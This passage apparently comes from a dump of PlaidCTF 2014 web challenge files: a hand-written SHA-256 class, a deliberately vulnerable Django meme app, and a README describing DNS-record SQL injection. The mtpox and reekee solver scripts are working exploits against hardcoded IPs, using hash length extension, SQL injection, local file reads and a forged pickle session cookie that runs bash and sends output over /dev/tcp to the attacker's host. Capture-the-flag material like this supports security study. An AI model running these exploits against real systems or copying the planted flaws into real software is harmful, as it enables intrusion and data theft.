0xf40e3585, 0x106aa070, 23 | 0x19a4c116, 0x1e376c08, 0x2748774c, 0x34b0bcb5, 24 | 0x391c0cb3, 0x4ed8aa4a, 0x5b9cca4f, 0x682e6ff3, 25 | 0x748f82ee, 0x78a5636f, 0x84c87814, 0x8cc70208, 26 | 0x90befffa, 0xa4506ceb, 0xbef9a3f7, 0xc67178f2) 27 | _h = (0x6a09e667, 0xbb67ae85, 0x3c6ef372, 0xa54ff53a, 28 | 0x510e527f, 0x9b05688c, 0x1f83d9ab, 0x5be0cd19) 29 | _output_size = 8 30 | 31 | blocksize = 1 32 | block_size = 64 33 | digest_size = 32 34 | 35 | def __init__(self, m=None): 36 | self._buffer = '' 37 | self._counter = 0 38 | 39 | if m is not None: 40 | if type(m) is not str: 41 | raise TypeError, '%s() argument 1 must be string, not %s' % (self.__class__.__name__, type(m).__name__) 42 | self.update(m) 43 | 44 | def _rotr(self, x, y): 45 | return ((x >> y) | (x << (32-y))) & 0xFFFFFFFF 46 | 47 | def _sha256_process(self, c): 48 | w = [0]*64 49 | w[0:15] = struct.unpack('!16L', c) 50 | 51 | for i in range(16, 64): 52 | s0 = self._rotr(w[i-15], 7) ^ self._rotr(w[i-15], 18) ^ (w[i-15] >> 3) 53 | s1 = self._rotr(w[i-2], 17) ^ self._rotr(w[i-2], 19) ^ (w[i-2] >> 10) 54 | w[i] = (w[i-16] + s0 + w[i-7] + s1) & 0xFFFFFFFF 55 | 56 | a,b,c,d,e,f,g,h = self._h 57 | 58 | for i in range(64): 59 | s0 = self._rotr(a, 2) ^ self._rotr(a, 13) ^ self._rotr(a, 22) 60 | maj = (a & b) ^ (a & c) ^ (b & c) 61 | t2 = s0 + maj 62 | s1 = self._rotr(e, 6) ^ self._rotr(e, 11) ^ self._rotr(e, 25) 63 | ch = (e & f) ^ ((~e) & g) 64 | t1 = h + s1 + ch + self._k[i] + w[i] 65 | 66 | h = g 67 | g = f 68 | f = e 69 | e = (d + t1) & 0xFFFFFFFF 70 | d = c 71 | c = b 72 | b = a 73 | a = (t1 + t2) & 0xFFFFFFFF 74 | 75 | self._h = [(x+y) & 0xFFFFFFFF for x,y in zip(self._h, [a,b,c,d,e,f,g,h])] 76 | 77 | def update(self, m): 78 | if not m: 79 | return 80 | if type(m) is not str: 81 | raise TypeError, '%s() argument 1 must be string, not %s' % (sys._getframe().f_code.co_name, type(m).__name__) 82 | 83 | self._buffer += m 84 | self._counter += len(m) 85 | 86 | while len(self._buffer) >= 64: 87 | self._sha256_process(self._buffer[:64]) 88 | self._buffer = self._buffer[64:] 89 | 90 | def digest(self,fake_len=0): 91 | mdi = self._counter & 0x3F 92 | if fake_len != 0: 93 | length = struct.pack('!Q', fake_len) 94 | else: 95 | length = struct.pack('!Q', self._counter<<3) 96 | 97 | if mdi < 56: 98 | padlen = 55-mdi 99 | else: 100 | padlen = 119-mdi 101 | 102 | r = self.copy() 103 | r.update('\x80'+('\x00'*padlen)+length) 104 | return ''.join([struct.pack('!L', i) for i in r._h[:self._output_size]]) 105 | 106 | def hexdigest(self,fake_len=0): 107 | return self.digest(fake_len).encode('hex') 108 | 109 | def copy(self): 110 | return copy.deepcopy(self) 111 | 112 | 113 | -------------------------------------------------------------------------------- /web/mtpox/secrets.php: -------------------------------------------------------------------------------- 1 | 7 | -------------------------------------------------------------------------------- /web/mtpox/solver.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import requests 3 | from urllib import quote_plus as urlencode 4 | from pysha256 import sha256 5 | 6 | HOST = "54.211.6.40" 7 | 8 | r = requests.get("http://"+HOST+"/admin.php") 9 | 10 | orig_val = r.cookies['auth'] 11 | 12 | prefix_len = 8 13 | orig_val = "b:0;"[::-1] 14 | new_thing = "b:1;"[::-1] 15 | 16 | #THANKS EINDBAZEN 17 | h = sha256() 18 | orig_hash = r.cookies['hsh'] 19 | split_hash = map(lambda x: int(x,16),[orig_hash[x:x+8] for x in range(0,len(orig_hash),8)]) 20 | 21 | h = sha256() 22 | h._h = split_hash[:] 23 | h.update(new_thing) 24 | new_val = orig_val + '\x80' 25 | new_val += '\x00' * (64-(prefix_len)-len(orig_val)-2) 26 | padlen = (prefix_len + len(orig_val)) * 8 27 | new_val += chr(padlen) 28 | new_val += new_thing 29 | 30 | fake_len=(len(new_val) + prefix_len) * 8 31 | fake = h.hexdigest(fake_len).lower() 32 | 33 | cookies = {'auth':urlencode(new_val[::-1]), 'hsh':fake} 34 | r = requests.get("http://"+HOST+"/admin.php?query=1%20union%20select%20id%20from%20plaidcoin_wallets",cookies=cookies) 35 | print r.text 36 | -------------------------------------------------------------------------------- /web/mtpox/static/css/style.css: -------------------------------------------------------------------------------- 1 | body { 2 | padding-top: 70px; 3 | } 4 | 5 | table, th{ 6 | text-align: center; 7 | } 8 | 9 | .status-yes { 10 | color: green; 11 | } 12 | 13 | .status-broken, 14 | .status-no { 15 | font-weight: bold; 16 | color: red; 17 | } 18 | 19 | .grid_service a, 20 | .grid_team a { 21 | color: black; 22 | text-decoration:none; 23 | } 24 | -------------------------------------------------------------------------------- /web/reekee/distribute_me/font.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwning/plaidctf2014/1bf225f52a6501dac74044b176df39538de34c43/web/reekee/distribute_me/font.ttf -------------------------------------------------------------------------------- /web/reekee/distribute_me/manage.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import os 3 | import sys 4 | 5 | if __name__ == "__main__": 6 | os.environ.setdefault("DJANGO_SETTINGS_MODULE", "mymeme.settings") 7 | 8 | from django.core.management import execute_from_command_line 9 | 10 | execute_from_command_line(sys.argv) 11 | -------------------------------------------------------------------------------- /web/reekee/distribute_me/mymeme/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwning/plaidctf2014/1bf225f52a6501dac74044b176df39538de34c43/web/reekee/distribute_me/mymeme/__init__.py -------------------------------------------------------------------------------- /web/reekee/distribute_me/mymeme/settings.py: -------------------------------------------------------------------------------- 1 | """ 2 | Django settings for mymeme project. 3 | 4 | For more information on this file, see 5 | https://docs.djangoproject.com/en/1.6/topics/settings/ 6 | 7 | For the full list of settings and their values, see 8 | https://docs.djangoproject.com/en/1.6/ref/settings/ 9 | """ 10 | 11 | # Build paths inside the project like this: os.path.join(BASE_DIR, ...) 12 | import os 13 | BASE_DIR = os.path.dirname(os.path.dirname(__file__)) 14 | 15 | 16 | # Quick-start development settings - unsuitable for production 17 | # See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/ 18 | 19 | # SECURITY WARNING: keep the secret key used in production secret! 20 | SECRET_KEY = 'LOLOLOL THIS ISNT THE REAL SECRET KEY OF COURSE!!!' 21 | 22 | # SECURITY WARNING: don't run with debug turned on in production! 23 | DEBUG = False 24 | 25 | TEMPLATE_DEBUG = False 26 | 27 | ALLOWED_HOSTS = [] 28 | 29 | 30 | # Application definition 31 | 32 | INSTALLED_APPS = ( 33 | 'django.contrib.admin', 34 | 'django.contrib.auth', 35 | 'django.contrib.contenttypes', 36 | 'django.contrib.sessions', 37 | 'django.contrib.messages', 38 | 'django.contrib.staticfiles', 39 | ) 40 | 41 | MIDDLEWARE_CLASSES = ( 42 | 'django.contrib.sessions.middleware.SessionMiddleware', 43 | 'django.middleware.common.CommonMiddleware', 44 | 'django.middleware.csrf.CsrfViewMiddleware', 45 | 'django.contrib.auth.middleware.AuthenticationMiddleware', 46 | 'django.contrib.messages.middleware.MessageMiddleware', 47 | 'django.middleware.clickjacking.XFrameOptionsMiddleware', 48 | ) 49 | 50 | TEMPLATE_DIRS = ('templates',) 51 | 52 | ROOT_URLCONF = 'mymeme.urls' 53 | 54 | WSGI_APPLICATION = 'mymeme.wsgi.application' 55 | 56 | #HMMMMM 57 | SESSION_SERIALIZER = 'django.contrib.sessions.serializers.PickleSerializer' 58 | SESSION_ENGINE = 'django.contrib.sessions.backends.signed_cookies' 59 | 60 | # Database 61 | # https://docs.djangoproject.com/en/1.6/ref/settings/#databases 62 | 63 | DATABASES = { 64 | 'default': { 65 | 'ENGINE': 'django.db.backends.sqlite3', 66 | 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), 67 | } 68 | } 69 | 70 | # Internationalization 71 | # https://docs.djangoproject.com/en/1.6/topics/i18n/ 72 | 73 | LANGUAGE_CODE = 'en-us' 74 | 75 | TIME_ZONE = 'UTC' 76 | 77 | USE_I18N = True 78 | 79 | USE_L10N = True 80 | 81 | USE_TZ = True 82 | 83 | 84 | # Static files (CSS, JavaScript, Images) 85 | # https://docs.djangoproject.com/en/1.6/howto/static-files/ 86 | 87 | STATIC_URL = '/static/' 88 | -------------------------------------------------------------------------------- /web/reekee/distribute_me/mymeme/urls.py: -------------------------------------------------------------------------------- 1 | from django.conf.urls import patterns, include, url 2 | 3 | urlpatterns = patterns('mymeme.views', 4 | (r'login', 'logmein'), 5 | (r'logout', 'logmeout'), 6 | (r'register', 'register'), 7 | (r'make', 'makememe'), 8 | (r'view/(?P\d+)', 'viewmeme'), 9 | (r'view', 'viewmeme'), 10 | (r'index', 'index'), 11 | (r'^/?$', 'index') 12 | ) 13 | -------------------------------------------------------------------------------- /web/reekee/distribute_me/mymeme/views.py: -------------------------------------------------------------------------------- 1 | from django.http import HttpResponse 2 | from django.contrib.auth import authenticate, login, logout 3 | from django.contrib.auth.models import User 4 | from django.contrib.auth.decorators import login_required 5 | #from django.contrib.auth.forms import 6 | from django.shortcuts import redirect,render 7 | from django import forms 8 | import os,urllib2,imghdr 9 | from PIL import Image, ImageFont, ImageDraw 10 | 11 | BACK = """
    17 | 18 | 19 | 20 | """ 21 | 22 | def user_exists(username): 23 | if User.objects.filter(username=username).count(): 24 | return True 25 | return False 26 | 27 | def get_next_file(username): 28 | bp = "/tmp/memes/"+username+"/" 29 | if len(os.listdir(bp)) > 9: 30 | return bp+min(os.listdir(bp), key=lambda x:os.path.getctime(bp+x)) 31 | else: 32 | return bp+str(len(os.listdir(bp))) 33 | 34 | def add_text(fn,fmt,text): 35 | i = Image.open(fn) 36 | d = ImageDraw.Draw(i) 37 | d.text((0,0),text,(255,255,255),font=ImageFont.truetype("font.ttf", 30)) 38 | i.save(fn,format=fmt) 39 | 40 | def logmein(request): 41 | if request.method == 'POST': 42 | username = request.POST['username'] 43 | password = request.POST['password'] 44 | user = authenticate(username=username, password=password) 45 | if user is not None: 46 | if user.is_active: 47 | login(request, user) 48 | return redirect('/index') 49 | return HttpResponse("Error: login failed"+BACK) 50 | return render(request,"login.html") 51 | 52 | def logmeout(request): 53 | logout(request) 54 | return redirect('/index') 55 | 56 | def register(request): 57 | if request.method == 'POST': 58 | username = request.POST['username'] 59 | password = request.POST['password'] 60 | if user_exists(username): 61 | return HttpResponse("Error: user exists"+BACK) 62 | if (".." in username) or ("/" in username): 63 | return HttpResponse("Error: invalid username"+BACK) 64 | try: 65 | os.mkdir("/tmp/memes/"+username) 66 | except: 67 | return HttpResponse("Error: failed to create user"+BACK) 68 | User.objects.create_user(username,password=password) 69 | user = authenticate(username=username, password=password) 70 | login(request,user) 71 | return redirect('/index') 72 | return render(request,"register.html") 73 | 74 | @login_required(login_url='/login') 75 | def makememe(request): 76 | username = str(request.user) 77 | if request.method == 'POST': 78 | url = request.POST['url'] 79 | text = request.POST['text'] 80 | try: 81 | if "http://" in url: 82 | image = urllib2.urlopen(url) 83 | else: 84 | image = urllib2.urlopen("http://"+url) 85 | except: 86 | return HttpResponse("Error: couldn't get to that URL"+BACK) 87 | if int(image.headers["Content-Length"]) > 1024*1024: 88 | return HttpResponse("File too large") 89 | fn = get_next_file(username) 90 | print fn 91 | open(fn,"w").write(image.read()) 92 | add_text(fn,imghdr.what(fn),text) 93 | return render(request,"make.html",{'files':os.listdir("/tmp/memes/"+username)}) 94 | 95 | @login_required(login_url='/login') 96 | def viewmeme(request,meme=None): 97 | print meme 98 | username = str(request.user) 99 | if meme is not None: 100 | filename = "/tmp/memes/"+username+"/"+str(meme) 101 | ctype = str(imghdr.what(filename)) 102 | return HttpResponse(open(filename).read(),content_type="image/"+ctype) 103 | else: 104 | return render(request,"view.html",{'files':sorted(os.listdir("/tmp/memes/"+username), key=lambda x:os.path.getctime(bp+x) )}) 105 | return HttpResponse("view"+username) 106 | 107 | def index(request): 108 | print [request.session[a] for a in request.session.keys()] 109 | return render(request,"index.html",{'auth':request.user.is_authenticated()}) 110 | -------------------------------------------------------------------------------- /web/reekee/distribute_me/mymeme/wsgi.py: -------------------------------------------------------------------------------- 1 | """ 2 | WSGI config for mymeme project. 3 | 4 | It exposes the WSGI callable as a module-level variable named ``application``. 5 | 6 | For more information on this file, see 7 | https://docs.djangoproject.com/en/1.6/howto/deployment/wsgi/ 8 | """ 9 | 10 | import os 11 | os.environ.setdefault("DJANGO_SETTINGS_MODULE", "mymeme.settings") 12 | 13 | from django.core.wsgi import get_wsgi_application 14 | application = get_wsgi_application() 15 | -------------------------------------------------------------------------------- /web/reekee/distribute_me/templates/head.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | MyMeme 4 | 5 | 6 | 46 | -------------------------------------------------------------------------------- /web/reekee/distribute_me/templates/index.html: -------------------------------------------------------------------------------- 1 | {% include "head.html" %} 2 | {% if auth %} 3 | Head on over here to make/view your super awesome memes. If you're done with memes for now, you can logout. 4 | {% else %} 5 | In order to create your own super awesome memes, you must login. 6 | {% endif %} 7 | -------------------------------------------------------------------------------- /web/reekee/distribute_me/templates/login.html: -------------------------------------------------------------------------------- 1 | {% include "head.html" %} 2 |
    3 |
    4 |
    5 | {% csrf_token %} 6 | 7 |
    8 | 9 |

    Don't have an account? Register today!

    10 | -------------------------------------------------------------------------------- /web/reekee/distribute_me/templates/make.html: -------------------------------------------------------------------------------- 1 | {% include "head.html" %} 2 | If you're done with memes for now, you can logout. 3 | 4 |
    5 |
    6 |
    7 | {% csrf_token %} 8 | 9 |
    10 | 11 |

    Your memes

    12 | {% for f in files %} 13 |
    14 | {% endfor %} 15 | 16 |

    Note memes are currently not shareable. If you would like to share your creations, please download them and upload them to your favorite image hosting website

    17 | -------------------------------------------------------------------------------- /web/reekee/distribute_me/templates/register.html: -------------------------------------------------------------------------------- 1 | {% include "head.html" %} 2 |
    3 |
    4 |
    5 | {% csrf_token %} 6 | 7 |
    8 | -------------------------------------------------------------------------------- /web/reekee/distribute_me/templates/view.html: -------------------------------------------------------------------------------- 1 | {% for f in files %} 2 | 3 | {% endfor %} 4 | -------------------------------------------------------------------------------- /web/reekee/give_me_the_flag.exe.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | const char *filename = "./use_exe_to_read_me.txt"; 6 | 7 | int main() { 8 | int fd = open(filename, O_RDONLY); 9 | if(fd < 0) { 10 | perror("open"); 11 | printf("Must be run in same directory as %s\n", filename); 12 | return -1; 13 | } 14 | 15 | char buf[1024]; 16 | ssize_t len = read(fd, buf, sizeof buf); 17 | if(len < 0) { 18 | perror("read"); 19 | return -1; 20 | } 21 | 22 | if(write(STDOUT_FILENO, buf, len)) { 23 | perror("write"); 24 | return -1; 25 | } 26 | 27 | return 0; 28 | } 29 | 30 | -------------------------------------------------------------------------------- /web/reekee/mymeme/db.sqlite3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwning/plaidctf2014/1bf225f52a6501dac74044b176df39538de34c43/web/reekee/mymeme/db.sqlite3 -------------------------------------------------------------------------------- /web/reekee/mymeme/font.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwning/plaidctf2014/1bf225f52a6501dac74044b176df39538de34c43/web/reekee/mymeme/font.ttf -------------------------------------------------------------------------------- /web/reekee/mymeme/manage.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import os 3 | import sys 4 | 5 | if __name__ == "__main__": 6 | os.environ.setdefault("DJANGO_SETTINGS_MODULE", "mymeme.settings") 7 | 8 | from django.core.management import execute_from_command_line 9 | 10 | execute_from_command_line(sys.argv) 11 | -------------------------------------------------------------------------------- /web/reekee/mymeme/mymeme/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwning/plaidctf2014/1bf225f52a6501dac74044b176df39538de34c43/web/reekee/mymeme/mymeme/__init__.py -------------------------------------------------------------------------------- /web/reekee/mymeme/mymeme/settings.py: -------------------------------------------------------------------------------- 1 | """ 2 | Django settings for mymeme project. 3 | 4 | For more information on this file, see 5 | https://docs.djangoproject.com/en/1.6/topics/settings/ 6 | 7 | For the full list of settings and their values, see 8 | https://docs.djangoproject.com/en/1.6/ref/settings/ 9 | """ 10 | 11 | # Build paths inside the project like this: os.path.join(BASE_DIR, ...) 12 | import os 13 | BASE_DIR = os.path.dirname(os.path.dirname(__file__)) 14 | 15 | 16 | # Quick-start development settings - unsuitable for production 17 | # See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/ 18 | 19 | # SECURITY WARNING: keep the secret key used in production secret! 20 | SECRET_KEY = 'kgsu8jv!(bew#wm!eb3rb=7gy6=&5ew*jv)j-6-(50$f%no98-' 21 | 22 | # SECURITY WARNING: don't run with debug turned on in production! 23 | DEBUG = True 24 | 25 | TEMPLATE_DEBUG = True 26 | 27 | ALLOWED_HOSTS = [] 28 | 29 | 30 | # Application definition 31 | 32 | INSTALLED_APPS = ( 33 | 'django.contrib.admin', 34 | 'django.contrib.auth', 35 | 'django.contrib.contenttypes', 36 | 'django.contrib.sessions', 37 | 'django.contrib.messages', 38 | 'django.contrib.staticfiles', 39 | ) 40 | 41 | MIDDLEWARE_CLASSES = ( 42 | 'django.contrib.sessions.middleware.SessionMiddleware', 43 | 'django.middleware.common.CommonMiddleware', 44 | 'django.middleware.csrf.CsrfViewMiddleware', 45 | 'django.contrib.auth.middleware.AuthenticationMiddleware', 46 | 'django.contrib.messages.middleware.MessageMiddleware', 47 | 'django.middleware.clickjacking.XFrameOptionsMiddleware', 48 | ) 49 | 50 | TEMPLATE_DIRS = ('templates',) 51 | 52 | ROOT_URLCONF = 'mymeme.urls' 53 | 54 | WSGI_APPLICATION = 'mymeme.wsgi.application' 55 | 56 | #HMMMMM 57 | SESSION_SERIALIZER = 'django.contrib.sessions.serializers.PickleSerializer' 58 | SESSION_ENGINE = 'django.contrib.sessions.backends.signed_cookies' 59 | 60 | # Database 61 | # https://docs.djangoproject.com/en/1.6/ref/settings/#databases 62 | 63 | DATABASES = { 64 | 'default': { 65 | 'ENGINE': 'django.db.backends.sqlite3', 66 | 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), 67 | } 68 | } 69 | 70 | # Internationalization 71 | # https://docs.djangoproject.com/en/1.6/topics/i18n/ 72 | 73 | LANGUAGE_CODE = 'en-us' 74 | 75 | TIME_ZONE = 'UTC' 76 | 77 | USE_I18N = True 78 | 79 | USE_L10N = True 80 | 81 | USE_TZ = True 82 | 83 | 84 | # Static files (CSS, JavaScript, Images) 85 | # https://docs.djangoproject.com/en/1.6/howto/static-files/ 86 | 87 | STATIC_URL = '/static/' 88 | -------------------------------------------------------------------------------- /web/reekee/mymeme/mymeme/urls.py: -------------------------------------------------------------------------------- 1 | from django.conf.urls import patterns, include, url 2 | 3 | urlpatterns = patterns('mymeme.views', 4 | (r'login', 'logmein'), 5 | (r'logout', 'logmeout'), 6 | (r'register', 'register'), 7 | (r'make', 'makememe'), 8 | (r'view/(?P\d+)', 'viewmeme'), 9 | (r'view', 'viewmeme'), 10 | (r'index', 'index'), 11 | (r'^/?$', 'index') 12 | ) 13 | -------------------------------------------------------------------------------- /web/reekee/mymeme/mymeme/views.py: -------------------------------------------------------------------------------- 1 | from django.http import HttpResponse 2 | from django.contrib.auth import authenticate, login, logout 3 | from django.contrib.auth.models import User 4 | from django.contrib.auth.decorators import login_required 5 | #from django.contrib.auth.forms import 6 | from django.shortcuts import redirect,render 7 | from django import forms 8 | import os,urllib2,imghdr 9 | from PIL import Image, ImageFont, ImageDraw 10 | 11 | BACK = """
    17 | 18 | 19 | 20 | """ 21 | 22 | def user_exists(username): 23 | if User.objects.filter(username=username).count(): 24 | return True 25 | return False 26 | 27 | def get_next_file(username): 28 | bp = "/tmp/memes/"+username+"/" 29 | if len(os.listdir(bp)) > 9: 30 | return bp+min(os.listdir(bp), key=lambda x:os.path.getctime(bp+x)) 31 | else: 32 | return bp+str(len(os.listdir(bp))) 33 | 34 | def add_text(fn,fmt,text): 35 | i = Image.open(fn) 36 | d = ImageDraw.Draw(i) 37 | d.text((0,0),text,(255,255,255),font=ImageFont.truetype("font.ttf", 30)) 38 | i.save(fn,format=fmt) 39 | 40 | def logmein(request): 41 | if request.method == 'POST': 42 | username = request.POST['username'] 43 | password = request.POST['password'] 44 | user = authenticate(username=username, password=password) 45 | if user is not None: 46 | if user.is_active: 47 | login(request, user) 48 | return redirect('/index') 49 | return HttpResponse("Error: login failed"+BACK) 50 | return render(request,"login.html") 51 | 52 | def logmeout(request): 53 | logout(request) 54 | return redirect('/index') 55 | 56 | def register(request): 57 | if request.method == 'POST': 58 | username = request.POST['username'] 59 | password = request.POST['password'] 60 | if user_exists(username): 61 | return HttpResponse("Error: user exists"+BACK) 62 | if (".." in username) or ("/" in username): 63 | return HttpResponse("Error: invalid username"+BACK) 64 | try: 65 | os.mkdir("/tmp/memes/"+username) 66 | except: 67 | return HttpResponse("Error: failed to create user"+BACK) 68 | User.objects.create_user(username,password=password) 69 | user = authenticate(username=username, password=password) 70 | login(request,user) 71 | return redirect('/index') 72 | return render(request,"register.html") 73 | 74 | @login_required(login_url='/login') 75 | def makememe(request): 76 | username = str(request.user) 77 | if request.method == 'POST': 78 | url = request.POST['url'] 79 | text = request.POST['text'] 80 | try: 81 | if "http://" in url: 82 | image = urllib2.urlopen(url) 83 | else: 84 | image = urllib2.urlopen("http://"+url) 85 | except: 86 | return HttpResponse("Error: couldn't get to that URL"+BACK) 87 | if int(image.headers["Content-Length"]) > 1024*1024: 88 | return HttpResponse("File too large") 89 | fn = get_next_file(username) 90 | print fn 91 | open(fn,"w").write(image.read()) 92 | add_text(fn,imghdr.what(fn),text) 93 | return render(request,"make.html",{'files':os.listdir("/tmp/memes/"+username)}) 94 | 95 | @login_required(login_url='/login') 96 | def viewmeme(request,meme=None): 97 | print meme 98 | username = str(request.user) 99 | if meme is not None: 100 | filename = "/tmp/memes/"+username+"/"+str(meme) 101 | ctype = str(imghdr.what(filename)) 102 | return HttpResponse(open(filename).read(),content_type="image/"+ctype) 103 | else: 104 | return render(request,"view.html",{'files':sorted(os.listdir("/tmp/memes/"+username), key=lambda x:os.path.getctime(bp+x) )}) 105 | return HttpResponse("view"+username) 106 | 107 | def index(request): 108 | print [request.session[a] for a in request.session.keys()] 109 | return render(request,"index.html",{'auth':request.user.is_authenticated()}) 110 | -------------------------------------------------------------------------------- /web/reekee/mymeme/mymeme/wsgi.py: -------------------------------------------------------------------------------- 1 | """ 2 | WSGI config for mymeme project. 3 | 4 | It exposes the WSGI callable as a module-level variable named ``application``. 5 | 6 | For more information on this file, see 7 | https://docs.djangoproject.com/en/1.6/howto/deployment/wsgi/ 8 | """ 9 | 10 | import os 11 | os.environ.setdefault("DJANGO_SETTINGS_MODULE", "mymeme.settings") 12 | 13 | from django.core.wsgi import get_wsgi_application 14 | application = get_wsgi_application() 15 | -------------------------------------------------------------------------------- /web/reekee/mymeme/templates/head.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | MyMeme 4 | 5 | 6 | 46 | -------------------------------------------------------------------------------- /web/reekee/mymeme/templates/index.html: -------------------------------------------------------------------------------- 1 | {% include "head.html" %} 2 | {% if auth %} 3 | Head on over here to make/view your super awesome memes. If you're done with memes for now, you can logout. 4 | {% else %} 5 | In order to create your own super awesome memes, you must login. 6 | {% endif %} 7 | -------------------------------------------------------------------------------- /web/reekee/mymeme/templates/login.html: -------------------------------------------------------------------------------- 1 | {% include "head.html" %} 2 |
    3 |
    4 |
    5 | {% csrf_token %} 6 | 7 |
    8 | 9 |

    Don't have an account? Register today!

    10 | -------------------------------------------------------------------------------- /web/reekee/mymeme/templates/make.html: -------------------------------------------------------------------------------- 1 | {% include "head.html" %} 2 | If you're done with memes for now, you can logout. 3 | 4 |
    5 |
    6 |
    7 | {% csrf_token %} 8 | 9 |
    10 | 11 |

    Your memes

    12 | {% for f in files %} 13 |
    14 | {% endfor %} 15 | 16 |

    Note memes are currently not shareable. If you would like to share your creations, please download them and upload them to your favorite image hosting website

    17 | -------------------------------------------------------------------------------- /web/reekee/mymeme/templates/register.html: -------------------------------------------------------------------------------- 1 | {% include "head.html" %} 2 |
    3 |
    4 |
    5 | {% csrf_token %} 6 | 7 |
    8 | -------------------------------------------------------------------------------- /web/reekee/mymeme/templates/view.html: -------------------------------------------------------------------------------- 1 | {% for f in files %} 2 | 3 | {% endfor %} 4 | -------------------------------------------------------------------------------- /web/reekee/solver.py: -------------------------------------------------------------------------------- 1 | import mechanize,os 2 | import cPickle as pickle 3 | import socket,random 4 | 5 | MYIP = "54.82.108.138" 6 | HOST = "http://54.82.251.203:8000/" 7 | 8 | myname = os.urandom(8).encode("hex")+"http:" 9 | 10 | br = mechanize.Browser() 11 | br.open(HOST+"register") 12 | 13 | reg = list(br.forms())[0] 14 | reg["username"] = myname 15 | reg["password"] = myname 16 | 17 | br.open(reg.click()) 18 | 19 | 20 | i = 0 21 | def readfile(path): 22 | global i 23 | br.open(HOST+"make") 24 | mak = list(br.forms())[0] 25 | mak["url"] = "file:///tmp/memes/%s//../../../%s"%(myname,path) 26 | mak["text"] = "foo" 27 | try: 28 | br.open(mak.click()) 29 | except: 30 | pass #it will 500, that's okay 31 | dat = br.open(HOST+"view/%d"%(i%10)).read() 32 | i+=1 33 | return dat 34 | 35 | environ = readfile("/proc/self/environ") 36 | djpath = filter(lambda x:"PWD" == x[:3], environ.split("\x00"))[0].split("=")[1] 37 | 38 | appname = djpath[djpath.rindex("/")+1:] 39 | djbsettings = readfile(djpath + "/" + appname + "/settings.py") 40 | #LOL YES I KNOW, but I wrote the code and I know it doesn't do malicious things here 41 | exec(filter(lambda x:"SECRET_KEY" in x, djbsettings.split("\n"))[0]) 42 | exec(filter(lambda x:"SESSION_ENGINE" in x, djbsettings.split("\n"))[0]) 43 | 44 | import django.core.signing as d 45 | 46 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 47 | port = random.randint(9000,65000) 48 | s.bind(('0.0.0.0',port)) 49 | print "listening on %d"%port 50 | s.listen(5) 51 | 52 | pdata = "cos\nsystem\n(S'%s'\ntR." % (" bash -c 'cd /home/reekee/; ./give_me_the_flag.exe > /dev/tcp/%s/%d' "%(MYIP,port)) 53 | t = d.TimestampSigner(SECRET_KEY, salt=SESSION_ENGINE).sign(d.b64_encode(pdata)) 54 | print t 55 | br = mechanize.Browser() 56 | br.open(HOST) 57 | br.set_cookie("sessionid="+t+";") 58 | try: 59 | br.open(HOST) 60 | except: 61 | pass 62 | client, addr = s.accept() 63 | print addr 64 | print client.recv(1024) 65 | 66 | -------------------------------------------------------------------------------- /web/reekee/use_exe_to_read_me.txt: -------------------------------------------------------------------------------- 1 | flag: why_did_they_make_me_write_web_apps 2 | -------------------------------------------------------------------------------- /web/whatscat/README: -------------------------------------------------------------------------------- 1 | Silly and kind of crazy web problem: 2 | we host a server (MUST HAVE IPv6 ADDRESS) 3 | ideally with an smtp server installed as well 4 | 5 | to setup: host the to_host folder, as well as the source.tar file 6 | initialize the database with database.sql 7 | 8 | Source is given (linked to on the page) 9 | goal is SQL injection, to read the flag column from the flag table 10 | 11 | the vuln: 12 | when resetting an account, the information on the client is saved. 13 | this information includes dns_get_record of the reverse dns of the host 14 | the host is mysql escaped, but not the dns record 15 | putting sql injection in the txt record of the host allows sql injection 16 | 17 | The method I used to do this: 18 | create an ipv6 tunnel account at hurricane electric 19 | they let you specify reverse dns information. point reverse dns of your 20 | ip to secret3.copyfighter.org 21 | 22 | this has a txt entry of "*/', email=(select flag from flag), resetinfo='/*" 23 | 24 | this will set the email of the user to the result of that select query 25 | the comments are needed because the way the dns information is stored 26 | (and printed to the user in email, for helpful debugging :P) 27 | it is repeated, so the comments make it count only one time 28 | 29 | then you reset the password a second time, which will print the 30 | email address of the account 31 | 32 | (at first I used the username field, but the database requires this to 33 | be unique so it failed... contestants will be able to see this, because 34 | trying to register an account that already exists will simply print out the 35 | error) 36 | -------------------------------------------------------------------------------- /web/whatscat/database.sql: -------------------------------------------------------------------------------- 1 | -- MySQL dump 10.13 Distrib 5.5.35, for debian-linux-gnu (x86_64) 2 | -- 3 | -- Host: localhost Database: whatscat 4 | -- ------------------------------------------------------ 5 | -- Server version 5.5.35-0ubuntu0.12.04.2 6 | 7 | /*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */; 8 | /*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */; 9 | /*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */; 10 | /*!40101 SET NAMES utf8 */; 11 | /*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */; 12 | /*!40103 SET TIME_ZONE='+00:00' */; 13 | /*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */; 14 | /*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */; 15 | /*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */; 16 | /*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */; 17 | 18 | 19 | -- 20 | -- Table structure for table `comments` 21 | -- 22 | 23 | DROP TABLE IF EXISTS `comments`; 24 | /*!40101 SET @saved_cs_client = 